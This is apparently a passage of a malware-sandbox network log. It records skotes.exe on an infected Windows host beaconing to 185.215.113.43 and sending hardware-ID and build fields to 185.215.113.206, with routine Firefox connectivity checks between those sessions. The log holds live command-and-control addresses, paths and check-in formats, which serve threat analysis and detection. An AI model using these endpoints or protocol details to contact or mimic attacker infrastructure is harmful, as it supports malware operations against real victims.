Dec 14, 2024 12:57:23.535264015 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"stok------GCGHCBKFCFBFHIDHDBFC--
Dec 14, 2024 12:57:23.986706018 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50024	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:22.994018078 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:24.340853930 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50034	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:25.691334963 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:26.783545971 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77099 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:28.760359049 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:29.075527906 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77101 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:30.166919947 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:30.482086897 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77103 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:30.643872976 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:30.958928108 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77103 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:31.412110090 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:31.727880955 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77104 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:31.871303082 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:32.186803102 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77105 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:32.792715073 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:33.108083963 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77105 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:36.906443119 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:37.221934080 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77110 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:47.315653086 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:57:48.494668007 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:57:48.812351942 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77121 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:57:58.822860003 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:09.022943020 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:09.785641909 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:58:10.101645947 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77142 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:58:20.121550083 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:30.319782972 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:40.531790972 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:50.723120928 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:51.233288050 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:58:51.549072027 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77184 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 12:59:01.618830919 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:59:11.830163956 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:59:22.022046089 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:59:50.374994993 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:59:50.690718889 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77243 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:00:12.759426117 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:00:13.076853037 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77265 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:25.981652021 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:27.319458008 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50059	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:29.076857090 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:30.425703049 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50077	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:32.055403948 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:33.404436111 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	50085	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:33.786045074 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:57:35.119623899 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:57:35.121460915 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 2d 2d 0d 0a Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build"stok------BFIJEHCBAKFCAKFHCGDG--
Dec 14, 2024 12:57:35.562807083 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50090	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:35.150363922 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:36.497603893 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50101	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:38.128804922 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:39.476697922 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50109	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:41.231000900 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:42.973516941 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Dec 14, 2024 12:57:42.973747969 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50120	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:44.602895975 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:45.958883047 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50132	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:47.704022884 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:49.056344032 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50142	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:50.698043108 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:52.052612066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50151	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:53.797149897 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:57:55.147420883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50160	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
